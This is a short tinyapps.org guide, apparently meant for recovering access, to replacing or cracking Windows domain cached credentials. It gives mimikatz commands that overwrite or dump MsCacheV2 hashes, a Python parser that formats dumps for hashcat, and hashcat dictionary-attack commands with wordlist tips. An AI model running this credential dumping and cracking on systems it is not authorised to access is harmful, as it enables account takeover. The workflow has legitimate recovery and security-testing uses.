tinyapps.org / docs / Replace or recover domain cached credentials


1. Replace

Cached domain credentials can be modified with mimikatz's /kiwi switch [1]:

mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::cache /user:user-to-modify /password:new-password /kiwi

While logging in with the replaced password works, data secured by DPAPI (Data Protection API) is inaccessible after the change, because the key material derived from the original password is gone [2][3]. Programs that leverage DPAPI include EFS, Microsoft Outlook, Windows Live Mail, and Google Chrome, among others (though notably not Mozilla Firefox) [4][5].

2. Recover

Rather than replacing domain cached credentials, decrypting them may be possible:

2.1 Get the username and hash

mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::cache
...
* Iteration is set to default (10240)
...
[NL$1 - 2/23/2013 4:48:29 PM]
RID       : 0000045a (1114)
User      : MYDOMAIN\jsmith
MsCacheV2 : e4e4e18ac7d15990f64ebe1be1989d9f

2.1.1 Save to hash.txt in hashcat's DCC2 format (iteration count from the dump, username without the domain, then the MsCacheV2 hash), like so:

$DCC2$10240#jsmith#e4e4e18ac7d15990f64ebe1be1989d9f
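As an added example (not part of the original page), a small Python script that turns lsadump::cache output into the hashcat line format shown above, picking up the iteration count and handling several entries; the second cached entry in the sample is constructed data.

```python
import re

# Constructed sample modelled on the lsadump::cache excerpt above; the NL$2 entry is made up.
SAMPLE_OUTPUT = """\
mimikatz # lsadump::cache
...
* Iteration is set to default (10240)
...
[NL$1 - 2/23/2013 4:48:29 PM]
RID       : 0000045a (1114)
User      : MYDOMAIN\\jsmith
MsCacheV2 : e4e4e18ac7d15990f64ebe1be1989d9f

[NL$2 - 2/24/2013 9:12:03 AM]
RID       : 0000045b (1115)
User      : MYDOMAIN\\jdoe
MsCacheV2 : 0123456789abcdef0123456789abcdef
"""

ITER_RE = re.compile(r"\* Iteration is set to .*\((\d+)\)")
ENTRY_RE = re.compile(r"^\[NL\$\d+ - .*\]$", re.M)
# "User : DOMAIN\name" or "User : name"; the domain part is dropped for hashcat.
USER_RE = re.compile(r"^User\s*:\s*(?:(?P<domain>[^\\]+)\\)?(?P<user>\S+)", re.M)
# MsCacheV2 is a 16-byte value, so exactly 32 hex digits are accepted.
HASH_RE = re.compile(r"^MsCacheV2\s*:\s*([0-9a-fA-F]{32})\s*$", re.M)


def parse_cache_dump(text: str) -> list[dict]:
    """Return one record per cached entry: {"iterations", "user", "hash"}."""
    m = ITER_RE.search(text)
    iterations = int(m.group(1)) if m else 10240  # Windows default when the line is absent
    records = []
    for block in ENTRY_RE.split(text)[1:]:  # [0] is the preamble before the first entry
        um, hm = USER_RE.search(block), HASH_RE.search(block)
        if not (um and hm):
            continue  # skip entries with a missing or malformed field
        records.append({"iterations": iterations,
                        "user": um.group("user"),
                        "hash": hm.group(1).lower()})
    return records


def to_hashcat_lines(records: list[dict]) -> list[str]:
    """Format records as hashcat -m 2100 input: $DCC2$<iterations>#<user>#<hash>."""
    return [f"$DCC2${r['iterations']}#{r['user']}#{r['hash']}" for r in records]


if __name__ == "__main__":
    print("\n".join(to_hashcat_lines(parse_cache_dump(SAMPLE_OUTPUT))))
```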

2.2 Crack the hash

2.2.1 Acquire hashcat

$ git clone https://github.com/hashcat/hashcat.git
$ cd hashcat/
$ make

2.2.2 Begin cracking [6]

$ hashcat -a 0 -m 2100 --status -o found.txt hash.txt rocktastic.txt

-a 0 = set attack mode to straight / dictionary attack
-m 2100 = set hash mode to "Domain Cached Credentials 2 (DCC2), MS Cache 2"
--status = automatically update the status screen
-o found.txt = write any recovered password to found.txt
hash.txt = the hash saved in step 2.1.1
rocktastic.txt = Rocktastic: "a word list on steroids" [7]

2.2.3 If the stars align...

Status...........: Cracked
Hash.Type........: Domain Cached Credentials 2 (DCC2), MS Cache 2
Hash.Target......: $DCC2$10240#jsmith#e4e4e18ac7d15990f64ebe1be1989d9f
...
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts

Footnotes

  1. Special thanks to hft for sharing the undocumented /kiwi switch.
  2. "Utilities exist that can help overwrite the cached verifier. By using one of these utilities, an attacker can authenticate by using the overwritten value. ... Overwriting the password does not help an attacker replace the verifier, because the base keying material is incorrect. Therefore, data that is encrypted by using Encrypting File System or by using the Data Protection API (DPAPI) will not decrypt." —Cached credentials security in Windows Server 2003, in Windows XP, and in Windows 2000

  3. "Even though someone overrides Cached Logon Data, this person is not able to get access to our data protection API protected data." —Cached Credentials: Important Facts That You Cannot Miss

  4. "On Windows, Chrome encrypts the passwords with Windows DPAPI, which can be decrypted by any program running as the Windows user, unless the user's logon password is forcibly reset." —Comment by Ben N on Information Security

  5. "Chrome and IE use DPAPI for secrets, Firefox just uses a plaintext master key file since Mozilla is too cool for Windows." —Tweet by SwiftOnSecurity

  6. For better cracking performance, pair your wordlist with a high-quality basic rules file. Release the Kraken: Starting Your Password Cracking Journey suggests append_d.rule (adds numbers to the end of a password), append_s.rule (adds special characters to the end of a password), and leetspeak.rule (changes passwords to leetspeak).

  7. See also breachcompilation.txt and Weakpass 2.0.

created: 2019.01.29, updated: 2019.02.05